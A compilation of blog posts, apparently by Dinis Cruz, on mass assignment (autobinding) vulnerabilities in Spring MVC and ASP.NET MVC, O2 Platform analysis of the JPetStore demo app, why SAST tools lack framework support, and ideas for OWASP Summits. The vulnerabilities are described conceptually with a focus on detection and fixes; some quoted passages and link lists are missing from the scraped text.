**The part that raised my alarm was:

and

There are no mentions in that article of the words ‘security’ or ‘mass assignment’ so I wonder how much awareness there is for this issue?

Anybody has cycles to test it out?
**
****Is there any documentation for the OData ASP.NET Web API on this topic? **I couldn’t find any references in OData in WebAPI – RC release and OData support in ASP.NET Web API

Mass Assignment Vulnerability references:

Auto-Binding Vulnerability references (another name for Mass Assignment):

Should Mass Assignment be an OWASP Top 10 Vulnerability?

I was just having a thread with Dave (who is working on the OWASP Top 10 2013) about the idea that Mass Assignment vulnerabilites should be part of the next OWASP top 10, and here is his view:

_It has to be more prevalent than other issues, plus introduce as much, or more risk. The Risk methodology in the Top 10 is very explicit.

I just looked through ALL the stats provided as input to the OWASP Top 10 for 2013 and I find zero mention of AutoBinding or Mass Assignment.

I know Aspect has found some of these vulns, in the past few years, but we are talking about a handful that we’ve found out of 1000s of issues total.

Clickjacking hasn’t even made it into the Top 10 and its way more prevalent, I assume.

That said, doesn’t mean we can’t start some kind of awareness campaign at OWASP about new issues like Mass Assignment and Expression Language Injection, and anything else new/cool you are aware of.

1st steps would be to create an article about each vulnerability, and then get the code review and testing guides to cover those topics, and also maybe a Prevention Cheat Sheet for each too. The article and Cheat Sheet are the easiest things to knock out first.

_

My view is that it should be in the next OWASP Top 10, so I guess we need to start adding info about this vulnerability to the guides and cheat sheets :)

I will also help if we have data about how big this issue is, namely how many apps are vulnerable to it.

To see two practical examples of this vulnerability, take a look at:

Mass Assignment Vulnerability references:

Auto-Binding Vulnerability references (another name for Mass Assignment):

10 September 2008

ASP.NET MVC – XSS and AutoBind vulns in MVC Example

A while back (while in the middle of the research that lead to the publishing of the Security Vulnerabilities in the Spring Framework Model View Controller) I decided to check out if the (still in beta) ASP.NET MVC framework was vulnerable to it.

At first quick analysis it looks vulnerable to the AutoBinding issue (and also to XSS), so here is my draft research notes as download file ASP.NET MVC - XSS and AutoBind vulns in MVC).

Please let me know if I am missing something obvious, or maybe there is something on the new version that prevents this:

11 September 2009

Spring MVC 3.0 MVC Binding rules

Following the work done on the O2 Cmd - Spring MVC module and the conversations we had at OWASP AppSec Ireland about the security implications of the Spring Framework MVC, I spent some time today looking at what is happening at its next major release (3.0.x)

From the MVC documentation section 15.3.2.3 Supported handler method arguments and return types section in Spring 3.0 (see 15.3 Implementing Controllers ) we can see (included at the end of this post) the Spring MVC rules to:

a) map web data into controllers and

b) send data from controllers to the views.

There are quite a number of new features/capabilities, and most have security implications!

For reference, here are a number of good articles & Blog Posts on Spring MVC 3.0

I find a bit worrying that the security implications of the way Spring MVC works (for both old and new features) is NOT properly documented in these articles (for example making references to Security implications of the Spring DataBinder (note-to-self: create page with my & others past research on this topic))

The list below (from 15.3 Implementing Controllers) is what we need to add to the next version of O2 Cmd - Spring MVC module so that it supports Spring MVC 3.0 (in fact I need to dig out the docs about Spring MVC 2.5 works, and start there :) )

15.3.2.3 Supported handler method arguments and return types

Handler methods that are annotated with __@RequestMapping_ can have very flexible signatures. They may have arguments of the following types, in arbitrary order. (except for validation results, which need to follow right after the corresponding command object, if desired):_

• Request and/or response objects (Servlet API). Choose any specific request/response type, for example, __ServletRequest_ / _HttpServletRequest_._
• Session object (Servlet API): of type __HttpSession_. An argument of this type enforces the presence of a corresponding session. As a consequence, such an argument is never _null_._
• _org.springframework.web.context.request.WebRequest__ or _org.springframework.web.context.request.NativeWebRequest_. Allows for generic request parameter access as well as request/session attribute access, without ties to the native Servlet/Portlet API._
• _java.util.Locale__ for the current request locale, determined by the most specific locale resolver available, in effect, the configured _LocaleResolver_ in a Servlet environment._
• _java.io.InputStream__ / _java.io.Reader_ for access to the request’s content. This value is the raw InputStream/Reader as exposed by the Servlet API._
• _java.io.OutputStream__ / _java.io.Writer_ for generating the response’s content. This value is the raw OutputStream/Writer as exposed by the Servlet API._
• _@PathVariabe__ annotated parameters for access to URI template variables. See _Section 15.3.2.1, “URI Templates”_._
• _@RequestParam__ annotated parameters for access to specific Servlet request parameters. Parameter values are converted to the declared method argument type. See _Section 15.3.2.4, “Binding request parameters to method parameters with @RequestParam”_._
• _@RequestHeader__ annotated parameters for access to specific Servlet request HTTP headers. Parameter values are converted to the declared method argument type._
• _@RequestBody__ annotated parameters for access to the request HTTP body. Parameter values are converted to the declared method argument type using _HttpMessageConverter__s. See __Section 15.3.2.5, “Mapping the request body with the @RequestBody annotation”_._
• _java.util.Map__ / _org.springframework.ui.Model_ / _org.springframework.ui.ModelMap_ for enriching the implicit model that is exposed to the web view._
• Command or form objects to bind parameters to: as bean properties or fields, with customizable type conversion, depending on __@InitBinder_ methods and/or the HandlerAdapter configuration. See the_webBindingInitializer_ property on _AnnotationMethodHandlerAdapter_. Such command objects along with their validation results will be exposed as model attributes by default., using the non-qualified command class name in property notation. For example, “orderAddress” for type “mypackage.OrderAddress”. Specify a parameter-level _ModelAttribute_ annotation for declaring a specific model attribute name._
• _org.springframework.validation.Errors__ / _org.springframework.validation.BindingResult_ validation results for a preceding command or form object (the immediately preceding argument)._
• _org.springframework.web.bind.support.SessionStatus__ status handle for marking form processing as complete, which triggers the cleanup of session attributes that have been indicated by the_@SessionAttributes_ annotation at the handler type level._

The following return types are supported for handler methods:

• A __ModelAndView_ object, with the model implicitly enriched with command objects and the results of _@ModelAttribute_ annotated reference data accessor methods._
• A __Model_ object, with the view name implicitly determined through a _RequestToViewNameTranslator_ and the model implicitly enriched with command objects and the results of _@ModelAttribute__annotated reference data accessor methods.
• A __Map_ object for exposing a model, with the view name implicitly determined through a _RequestToViewNameTranslator_ and the model implicitly enriched with command objects and the results of_@ModelAttribute_ annotated reference data accessor methods._
• A __View_ object, with the model implicitly determined through command objects and _@ModelAttribute_ annotated reference data accessor methods. The handler method may also programmatically enrich the model by declaring a _Model_ argument (see above)._
• A __String_ value that is interpreted as the view name, with the model implicitly determined through command objects and _@ModelAttribute_ annotated reference data accessor methods. The handler method may also programmatically enrich the model by declaring a _Model_ argument (see above)._
• _void__ if the method handles the response itself (by writing the response content directly, declaring an argument of type _ServletResponse_ / _HttpServletResponse_ for that purpose) or if the view name is supposed to be implicitly determined through a _RequestToViewNameTranslator_ (not declaring a response argument in the handler method signature)._
• If the method is annotated with __@ResponseBody_, the return type is written to the response HTTP body. The return value will be converted to the declared method argument type using_HttpMessageConverter__s. See __Section 15.3.2.6, “Mapping the response body with the @ResponseBody annotation”_._
• Any other return type is considered as single model attribute to be exposed to the view, using the attribute name specified through __@ModelAttribute_ at the method level (or the default attribute name based on the return type class name). The model is implicitly enriched with command objects and the results of _@ModelAttribute_ annotated reference data accessor methods._

Finally … here is how I have been analysing Spring MVC apps using O2

One of the greatest challenges I always had when reviewing Spring MVC applications, was to gain a full picture of its controllers, and more importantly its CommandClasses (i.e. the POJOs that are AutoBinded by Spring and who are a common source of high/critical vulnerabilities in Spring MVC apps).

The way I approach these problems (visualizing/understanding Spring, Struts, DWR, Sharepoint, etc…), is to write scripts that consume the Application’s articfacts (web.xml, *-servlet.xml, source-code, class files) and then consolidate that information in ‘easy’ (or easier) to undersand visualizations.

Unfortunally most of the great examples that I had in the past were built on top of Client code, so I couldn’t really share them. But finally, the O2 Scripts have reached a level of maturity that it was easy to create a generic version of them for Spring’s MVC Demo application: JPetStore.

Ironically, this demo application from Spring (which is used by Spring Developers to learn how to use Spring), is actually vulnerable to a number of security issues, including some spectacular cases of the Spring MVC AutoBinding issue.

I have created a number of Blog posts and videos that hopefully will help you to understand (and replicate) the issue:

The other important factor about these examples, is that I finally have a real example that can be used when talking with the Spring Framework team, other OWASP/AppSec FOSS tools and with AppSec vendors (tools and service-providers). Basically, from now on the message is: here is a complete scenario, now lets figure out how to use your technology to fix, detect or mitigate this.

**
**
This is also a part of O2 that I was waiting for, in order to be able to fully participate in the current OWASP ‘reach the developer’ efforts. In order to reach the developers, we need to speak their language, and with these examples (and technology) I can finally communicate properly with developers, and show them how their app works.

Note that the point here is not to push that everybody should be using using O2 to perform this type of analysis! My objective with O2 is to show what can/should be done, and to allow others to create more native implementations of these techniques (in this case, there should be an eclipse plug-in to do this or to consume this data). Ultimately if we want to reach the developers we need to communicate with them using tools and techniques they are already used to.

There is still a lot to document and to map out (including other tools that merge even further the black-box and white box worlds), so please take these scripts for a test drive, and help me to create a really powerful ‘Spring MVC Security Analsys ToolKit’ that can dramatically increase the security of Spring MVC applications :)

We also need to start thinking about creating an (Open) ‘Spring MVC Security Rule Pack’ which can be maintained by the community and consumed by the multiple tools/services.

Final note for the .NET Crowd, the ASP.NET MVC has the same problem, and I although I have not looked at a big ASP.NET MVC app, I will bet that they will create the same types of vulnerabilties (so … if you have access to such an app, try the O2’s ASP.NET MVC visualizer on it :) )

Reaching out to Spring Developers

I just posted an entry on the Spring Framework forums http://forum.springsource.org/showthread.php?111901-Security-Vulnerabilities-with-JPetStore-and-visualization-of-the-AutoBinding-Issues which hopefully will get some tracking from their side.

I will reach out to my contacts over there (Spring Source), but if you know somebody at SpringSource (or at a heavy user of Spring MVC) please put them in touch.

Thanks

Couple more blog posts on JPetStore and additional Spring MVC Autobinding vulnerabilities

On the Spring MVC topic, I added a couple more blog posts and video to the O2 developer blog:

I also noticed that using the same autobinding vulnerability, it is possible to change the quantity of the item being purchased to a **negative **value which has interesting implications on the current purchase and more importantly on the global (to JPetStore) ‘item stock quantity’ value.

I have not scripted this latest issue, but if you want looking at trying these scripts, why don’t you have a go at writing it?

:)

Visualizing Spring MVC Annotations based Controls (and Autobinding PetClinic’s vulnerabilities)

If you want to use O2 on Spring MVC apps that use Annotation-Based controllers, there is an O2 module that you can use which will allow you to view/test those controllers (including the Autobinding elements)

Here is a blog post that shows how it works: Visualizing Spring MVC Annotations based Controls (and Autobinding PetClinic’s vulnerabilities)

This is quite an old O2 module (using the previous GUI), but what I really like about it, is that it shows how static analysis can be used to drive black box tests (which is the best way to perform blackbox reviews).

What we really need next, is to convert this code into the new ‘O2 Script based world’ and into the Spring MVC mappings classes (as shown in the JPetStore example).

Current O2 support for analyzing Spring MVC

During the past week I spent some time documenting O2’s support for Spring MVC apps.

There is still quite a lot to do before we can do a proper security analysis of the JPetStore and PetClinic applications (for example ‘mapping the JSPs to the controllers’), but hopefully these blog posts show the kind of analysis that is possible using O2:

JPetStore and PetClinic are demo apps which can be downloaded from here Packaged Spring MVC Security Test Apps: JPetStore and PetClinc (includes tomcat), or from the main Spring Framework source distribution (look in the samples folder)

For more details on the Spring MVC Autobinding Vulnerabilities see: “Two Security Vulnerabilities in the Spring Framework’s MVC” pdf (from 2008)

What needs to be done to map Static Analysis Traces from Controllers and Views

Here is a reply I just posted on the O2 Mailing list, which provides a number of ideas on how to map/glue partial traces (i.e. traces that have sinks on Controllers and Sources on Views)

I think we are exactly on the same page, and welcome to the wonderful world of ‘Framework behaviour mapping’ :)

I’ve done this quite a lot in the past, so let see if I can help you here.

The first thing you must do is to make sure that you have ‘scriptable’ access to ALL required artifacts. Since you will need to be doing a lot ‘automagically’ glueing, you have to make sure that you can programatically access the data you need.

From what I understand you already have the traces for the controllers and the views. So what about the config files? Is everything on those config files, or will you also need to parse the java/class files for more metadata. Btw, this is J2EE right?

The next thing you need to do, is to figure out the exact formula that maps the controllers to the views. And before you go any further you need to have a visualization of this (which can be as simple as a treeview, or as complex as a full blow graph model (which you can also do with O2 :) ).

After that, you will need to look at your sinks and sources and see if they are easy to match (this has to be done after you matched the controllers with the view, or you will get a huge amount of mappings, most of which will never happen in the real-world). One of the beauties of the IO2Finding and O2Trace format is that I was able to join traces by simple doing string matches (there are even helper methods to do that).

The idea/concept for Joining traces, is that you rewrite the Sinks and Sources so that they match:

For example, if you had a Controller ‘Sink’ with

• setAttribute(“A_KEY”, {taint value”})

and a **View ‘Source’ **with

• getAttribute(“A_Key”)

Then I would rewrite them (in-memory or in disk (if there is a large number of findings)) as:

Controller ‘Sink’ -> getset_Attribute_A_KEY()

** View ‘Source’ ** ->** ** getset_Attribute_A_KEY()

and then just:

• do a direct string Sink-to-Source match,
• glue them with a one-to-many traces/finding generation mode (i.e you will need to create a new trace for each unique Sink-to-Source mapping),
• look at the created findings (and finally you will be able to gain a better picture of what is going on)

This actually works very well, and scales spectacularly.

I have used this on lots of different ‘glue’ locations: Session/Global Variables, Interfaces, Database layers, Controllers->Views, Reflection, Aspect PointCuts, Validation routines, etc…

A good way forward is probably if we work together on doing this for Spring MVC’s JPetstore, since I’ve already started this process and it is a great case study. See the posts at http://o2platform.wordpress.com/category/java/spring-mvc/jpetstore/ , and my next step on this JPetStore security analysis is exactly to create a mapping for the JSPs (check out this post which talks about that: Finding the JSP views that are mapped to controlers in JPetStore (Spring MVC) )

Does this make sense?

Dinis Cruz

————————————– (end-of-email)

12 October 2011

Why doesn’t SAST have better Framework support (for example Spring MVC)?

I received this question today, and before I answered it, I was wondering if you guys wanted to have a go at it first:

”…I was reading over some of your blog entries, that made me thinks about the current state of SAST regarding the current frameworks.

I’ve been aware for a long time that SAST do not handle properly framework-level information. In the case of Spring MVC, the tools just don’t get the data flow, etc.

_
_

Since you worked at Ounce before, do you know any particular reason why they didn’t want to fo into that direction? I mean, this is a solvable problem (you somewhat show how to do that in O2). Even if they would need to implement new front-ends, this is still a very important task to be done if they wanted to compete directly with Fortify (especially since F. doesn’t get it either)….

For reference here are some of my previous Framework (i.e.Spring MVC) related posts:

What do you think?

[Update blog post: What does SAST mean? And where does it come from?]

What does SAST mean? And where does it come from?

After I posted Why doesn’t SAST have better Framework support (for example Spring MVC)? I received the question “What is SAST?” (which is a valid question since a Google search today for SAST returns some hilarious answers)

SAST **means **Static Analysis Software Testing , and (I believe) it was originally coined by Gartner when they published their Magic Quadrant for Static Application Security Testing report (first version in 2009).

SAST is basically what we usually (in the web world) call** Static Analysis of source code** (i.e. White Box tools). It cousin is DAST (Dynamic Application Security Testing) and is what we call Pentesting (i.e. BlackBox tools). Google’s DAST search results are also funny. Here is a more detailed answer on the difference between SAST and DAST.

As you will seen in Gartner’s website, they change for this report, but some companies have bought them and posted/leaked the PDF online (in a way that Google finds it)

Back on the topic of Framewoks, Neil MacDonald (from Gartner) is absolutely spot on in this 2009 entry: For Static Application Security Testing, Frameworks Matter

Btw, I wonder when will the O2 Platform be included in a Gartner Magic Quadrant report?

First Answer to: Why doesn’t SAST have better Framework support (for example Spring MVC)?

A couple days ago I received the question and asked here on this blog Why doesn’t SAST have better Framework support (for example Spring MVC)? (if don’t don’t what SAST means, see What does SAST mean? And where does it come from?)

I wrote the answer below on that day, but since I also posted this question to the O2 mailing list I wanted to give some space for others to chip in with their views (which they did, namely John Steven who I will reply to later):

There are a number of reasons why the tool vendors have not been able to provide decent (or even any) wide Framework Support on their tools

Note that this is not for lack of trying, for example the latest version of AppScan already supports WAFL (Web Application Flow Language) which is their attempt at creating a Framework descriptor language, HP is doing interesting work in their integration of WebInspect+Fortify and there are a couple new players (like WhiteHat, Veracode, Armorize) that claim will do a better job.

For me, the key problem that all tools have (not only SAST, but this is critical in SAST) is that they are all trying to find a ‘big red button’ while ignoring how the app actually works/behaves. They basically want to create a product that can just be pointed to an application and work.

The problem with this approach is that all apps are massively different!

The apps themselves are build on top of MASSIVE frameworks (from a point of view of their behaviour), and even when they use common frameworks (vs writing their own frameworks), the way the actual code flows tends to be quite unique per app.

So by trying to treat the “Application Behaviour’ as a black box, and choosing NOT to try to (really) understand/map how it works (beyond the default Java/.NET functionality or whatever ‘Framework Support’ they are able to have), these tools are trying to climb a mountain that is far too big and complex.

My approach with O2 has been **“I know I will have to map how the application works/behaves and that I will need to create (from the source-code or dynamic analysis) an working model of its real code/data-flows, and while I’m there, also create a set of rules for the tools that I can use. My only question is: how long will it take to gain the level of visibility that I will need in order to be able to do a good job”. **This is what I call ‘playing the Application Visibility game’

_
_

Basically with O2 I’m climbing a complete different mountain.

Lets take for example Spring MVC. The first things I do when looking at a Spring app are:

• review the source code in order to ‘codify’ how the controllers are configured and what is their behaviour (namely the URLs, Command Classes and Views).
• paying special attention to any ‘Framework behaviour modifications’, for example filters, authentication/authorization engines, or even direct spring MVC code patches
• then I continue these mappings into the inner-working of the application in order to identify its ‘hyper jumps’ (reflection, aop, setters/getters, hash-objects-used-to-carry-data, web services, data/storage layers, other abstraction layers, etc…) and ‘data changing’ steps like validation or object casting.
• then I map out the connection between the controllers and the views (which is very important because we can’t assume that there will be path into all views from all controllers)
• then…. (next actions depend on how the app is designed and what other APIs or Frameworks are used)

When I’m doing these steps, I (using O2) tend to do three things:

• Create mini tools that visualize what is going on (for example url mappings to controllers, or the complete command classes objects )
• Create Browser-Automation APIs that represent the expected behaviour of the target application (how to login, how to perform action XYZ, how to invoke a Web Service, etc…)
• Mass create rules for the tools available (for example I used to create 1000s of Ounce rules so that I would get the most of its Engine by getting it to create as many taint-flow traces as possible

So yes, I’m coding all the time

The only difference between engagements, is that I’m able to build on the technology developed on the previous engagements.

Again using Spring MVC as an example:

• First time I saw Spring MVC I had a script that did a dirty read of the XML files and extracted some metadata (with a lot of manual mappings)
• On next engagement I was able to add support for Java bytecode analysis and analyse the Spring MVC attributes (used to mass create Ounce rules)
• On next engagement , I was able to start visualizing the Command Classes and created an generic API for Spring MVC (with specific classes/objects to store Spring MVC metadata in a way that made sense to us (security consultants))
• On next engagement , I added a number of real powerful GUIs, improved the CommandClass resolution calculations and did a bunch of mappings between controllers and viewers
• On next engagement , I already had most of the core Spring MVC behaviour scripts in place, so I mainly focused on what specific about the application being analyzed

As you can see, although there is always some level of customization, its amount (and skill level) is reduced on each interaction (and this is how we will scale this type of analysis).

So to play this game (and to be able to do this type of analysis), this is what is needed from the tools used (in this case SAST)

• Ability to write scripts that directly control how the tool works
• Ideally most of the tool’s analysis capabilities is written in ‘dynamically compiled scripts’ so that it is possible to modify/adjust them to the current reality (created by the application being analysed)
• Ability to have direct access the tools internal capabilities via exposed APIs
• Ability to start and stop each analysis phase (with each phase providing a modifiable dump of its internal representations and analysis so far)
• Ability to consume, feed and correlate data from all sorts of sources: file system, config files, black-box scans, fuzzers, real-time instrumentation, security consultant’s brain
• Ability to mass create/manipulate rules
• Ability to write rules as scripts AND in a fast-prototyping language like: C#, Java, Python, Ruby or Javascript (i.e. not in C/C++ or XML)
• Ability to easily ‘process, filter and visualize in real-time’ thousands if not millions of findings (created by the large number of rules applied)
• Ability to create rules that analyse the thousands if not millions of findings findings created (i.e. create findings from findings)
• this is the ability to perform multi-phase analysis, each using different rules/techniques and targeted at a different types of vulnerabilities (for example SQL Injection vs Direct Object References)
• Ability to visualize the data that was created (in its multiple stages of maturity) so that a security consultant (and/or app developer) can help to connect the dots (with more scripts or config settings)
• Ability to add ‘business logic analysis’ to the findings discovered. (for example when taking Authorization and Authentication activities in account, an ‘direct SQL execution’ or ‘file upload’ security vulnerability finding in an admin panel, might actually be a feature)
• Ability to re-package the final findings into the SDL tools currently used by the client (bug tracking, collaboration, IDEs), in a way that makes sense to the client (i.e. using their terminology and workflows) and is immediately consumed
• Ability to package all analysis (and rules, workflows, scripts, etc…) into a single execution point (i.e. an *.exe). This is the ‘big button’ that can be inserted into the Build process
• Ability to execute individually the complete analysis required to confirm (and ideally to exploit) a particular issue. This is the ‘small button that can check if ONE issue has been fixed’

And here you can see why the SAST tools really struggle with frameworks, because they don’t want to play this game. Ironically the end result is the same ‘big button to press and get solid results’ , the only difference is how to get there.

My personal view (backed by real world experience) is that this is the only way that_ ‘good enough’_ framework support can be added to a SAST tool in a way that it will actually be usable by developers.

Note that I said_ ‘good enough’,** because usually the comment I receive when explaining that we need to do this is **”..well but only you (Dinis) wants this… and what we (tool vendor XYZ) wants to do, is to provide ‘Good Enough’ support “. _

_
_

Unfortunately for the tool vendors, I’m not asking for them to create a tool that would only add value to a small number of ‘expert security consultants’. I’m describing what they will need to do in order to add ‘good enough’ support for frameworks to their tools. Only then security consultants and app developers can customize those tools and deploy them to a wide audience (finally being able to have ‘decent support’ for the frameworks used and the target apps). The cases where there is no need to customize the engine (or rules) should be seen as ‘free passes’ (i.e. easy sales)

The bottom-line is that, if the path chosen by the tool vendors really worked, then today (Oct 2011), we should have much better Framework support in our tools. The reality is that we don’t even have in our current SAST tools decent support for vanilla Java or .NET language behaviours (for example: reflection, collections, arrays, base-classes behaviour). And part of the reason of currently struggle with Java or .NET, is because its core libraries are in itself a Framework :)

The good news is that I have shown with O2 how my proposed model can work in the real-work. It was done on top of an Open Source platform (O2), and it is out there for others to learn and copy

Unfortunately, I am one of the few O2 users that can really do this, so the next step is to find a way to scale O2’s techniques/usability and help SAST (and others) tools to develop/expose similar technology and wokflows.

Finally, the other reason why the tools vendors are not doing this is because there is very little ‘public’ (i.e. ‘on the record’) customer demand for this! Those nasty NDAs have a powerful side-effect on buyers (and end users) who won’t publicly say what they really think.

So in some ways, it is not 100% the vendors fault. They tend to react to their paying customers needs, who (since they can’t say “the tool doesn’t really work in my environment”) tend to ask for thinks like: “You need to be able scan XYZ Millions of line of code”, “You need to have support for Oracle databases”, “you need to have a report for the PCI XYZ”, “You need to support language XYZ”, etc…

Add to this the fact that SAST vendors :

• don’t see the security consulting companies (who would ask for the capabilities described above) as their partners (i.e. they try to get as much money from them as possible),
• want to control all/most the technology that they consume/create
• don’t have enough paying customers that put them to the ropes and demand that their tools really work
• still believe (or want to believe) that their tools actually work
• don’t have to deal with the side-effects of ‘applications scanned by their product got exploited by malicious attackers’ (i.e. got sued by their clients or by the attacker’s victims)

and you have a world where the SAST vendors don’t have an direct incentive to go down this path.

Note that some paying customers DO get some value from the current SAST tools (the ones that don’t have SAST tools as shelfware). And since there are no popular alternatives (O2’s market share is still very small :) ), these customers are resigned with the current status-quo (the others are trying to ignore the fact that they spent a pile of money of a tool that they have not found a way to work in their environment, or are trying to hire a consulting company to make it work).

The tragedy is that SAST’s marked could be enormous!!!

Just imagine that we were able to use SAST tools in a way that they were really able to map/visualize/analyze an entire code/data flow, and create ‘solid, defensible and comprehensive’ results (with very low False Positives and False Negatives)

Don’t you think the developers (and managers architects, buyers, consumer groups, government agencies, etc..) would be ALL over it?

This is what I am to say in my ‘Making Security Invisible by Becoming the Developer’s Best Friends’ presentation. If only we could be the developer’s best friends by showing them how their app actually works and what are the side effects of their code :)

Solution for fixing Spring’s JPetStore AutoBinding vulnerabilities

Here is an O2 blog post that describes my preferred solution for Fixing one of JPetStore’s AutoBinding Vulnerabilities (changing the purchase price)

I have to say that as a developer doing the code fix, it was simply amazing and very powerful to have the complete web workflow of the shopping cart available as an automated O2 script .

This allowed me to quickly ensure that:

a) the app still behaved as it should (after the fix)

b) the vulnerabilities identified where properly fixed

What do you think of the solution?

13 April 2012

Some proposed Visions for next OWASP Summit

Since Summits must be part of OWASP’s DNA , and in case some of you are thinking of putting energy in creating the next OWASP Summit, I really think that the ‘Summit Proposal’ concept I detailed here is a good model.

So starting from the point that first we need a strong theme/vision, here are a couple ideas:

• OWASP Summit on OWASP Projects - This would actually be at least one or more ‘mini-Summit(s)’ followed by a bigger one. The mini-summit(s) would be focused on very specific OWASP project’s activities (project review, project’s normalization/mapping, project XYZ, work, project’s consolidation, GIT migration, etc…) with the bigger Summit the one where the results (of those mini-summits) would be presented, and the main stakeholders (i.e. the OWASP Projects users) would come together to learn, share and collaborate
• **OWASP Summit on Web Frameworks - **This would be the location where the key players of Web Frameworks (like Spring, Struts, Apache Shiro, RoR, ASP.NET, J2EE Stack,Grails etc…) would come together with OWASP’s community, AND developers AND their ‘clients’. The key objective would be to figure out how to help to make those frameworks/platforms ‘secure by default’ or at least to allow developers to easily code them in a secure way. In fact we could even be a bit radical and do a **OWASP Summit on Apache Shiro **(http://shiro.apache.org/) since those guys are clearly doing something right and have the momentum in working with key frameworks
• OWASP Summit on Static Analysis - This is one that I’m specially very interested in, and would be focused on figuring a way to really make Static Analysis work in a web security world. There is so much potential with SAST technology which currently is not fulfilled because the multiple parties (from tools developers, to security consultants, to users, to clients, to regulatory bodies, etc…) are not collaborating and working together to figure out a number of Open Standards which we call all use to communicate (for example why can’t we feed static analysis data to a web proxy/scanner like ZAP?)
• OWASP Summit on Web Privacy - Privacy is becoming more and more a big issue in the Web World, and with: a) Browsers adding features like the Do not track header (http://donottrack.us/ ), b) new laws being passed, c) recent big privacies breaches, d) governments regulatory bodies wanting to do something about it , and … {many more recent developments} … Privacy is definitely a topic which will draw a good crowd (and although one day it might be big enough to have it’s own dedicated ‘Brower Summit’, I think in the short them, the Browser track (following the work done at the last Summit) should be part of this Summit).

Of course that there are many other hot topics or OWASP Projects we could create a Summit around (ESAPI, OpenSamm, Guide Trilogy, Cloud, DAST, Secure Coding, Code Review, PenTesting, etc…), what is needed to make it happen is a core team with passion and energy for it.

On the financial side of things, one thing that OWASP could do is to say:_ “Here is 50k seed money, the rest you need to find from other sources (including internally like OWASP Chapers)”_. And maybe even that 50k is not needed (if there is enough energy and supporters willing to buy ‘20k Summit tickets’ )

Why ASP.NET MVC is ‘insecure by design’ , just like Spring MVC (and why SAST can help)

In the recent Secure coding (and Application Security) must be invisible to developers post Joshbw posted this great comment on the reasons why we end up with ‘insecure by default Frameworks’

’…On top of that the frameworks are being developed with the same mindset of all of the other products out there - “What makes the customer happy first, and then maybe if security doesn’t interfere with that”. A great example is that MVCs really should employ declaritive binding rather than auto binding; **it really is a marginal hit to development and ensures that the only fields that can be set are those explicitely exposed by the dev. **Despite this problem being known for years even MS has taken the stance that devs should opt into declaritive binding despite the fact that MVCs are default allow….’

In a way Microsoft’s (and Spring’s) decision to chose the insecure default (see Spring MVC Autobinding Vulnerability) is probably the correct business decision.

Choosing the secure alternative, would introduce a hit to development (Joshbw thinks this would be marginal, but I’m not so sure), which these Framework developers felt could create a bad user experience (their users are the developers) and could potentially drive away users into other frameworks that had such ‘by default’ AutoBinding features.

This is why I say that We need Security-focused SAST/Static-Analysis rules so that we can deal with the cases where AutoBinding creates vulnerabilities.

In fact, a good example of security adding value to developers would be if those SAST rules (via an security engine) would actually automatically introduce those ‘Declarative Bindings’ without requiring a developer’s intervention (this could happen behind the scenes , ‘invisible’ to a developer, unless that was creating business impact (i.e. side-effect).

To see an example of what this could look like, take a look at The future of secure code? Fixing/Encoding .NET code in real time (in this case Response.Write)

On the commercial SAST front, as far as I know, only Armorize ventures into this ‘code fixing territory’

Starting to use the O2 Spring MVC viewer on ThreadFix

Using the Tool - O2 Cmd SpringMVC v1.0.exe (see more details on this post: Tool - O2 Cmd SpringMVC v1.0.exe - as standalone exe) here is how to start using it on ThreadFix from Denim Group (“ThreadFix is a software vulnerability aggregation and management system that helps organizations aggregate vulnerability data, generate virtual patches, and interact with software defect tracking systems.”)